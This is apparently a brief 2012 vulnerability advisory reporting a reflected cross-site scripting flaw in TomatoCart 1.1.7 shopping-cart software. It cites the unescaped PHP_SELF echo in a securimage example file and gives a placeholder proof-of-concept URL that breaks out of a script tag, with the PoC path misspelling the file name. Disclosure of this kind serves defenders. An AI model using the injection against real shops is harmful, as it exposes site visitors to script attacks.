-------------------------------------------------------------
Name    : TomatoCart 1.1.7 XSS 
-------------------------------------------------------------
Date    : 29.08.2012
-------------------------------------------------------------
Site    : www.tomatocart.com
-------------------------------------------------------------
Version : 1.1.7
-------------------------------------------------------------

1) What is it?
  This is very nice shopping cart software, You should try it! ;)


2) Type of bug?
  XSS


3) Where is the bug?

Try here:
tomatocart/ext/securimage/example_form.ajax.php:39:
            new Ajax.Request('<?php echo $_SERVER['PHP_SELF'] ?>',


4) PoC
  http://host/with/tomato/ext/secureimage/example_from.ajax.php/"></script><whatever.now>


5) More?

http://hauntit.blogspot.com
http://www.portswigger.org  
http://www.tomatocart.com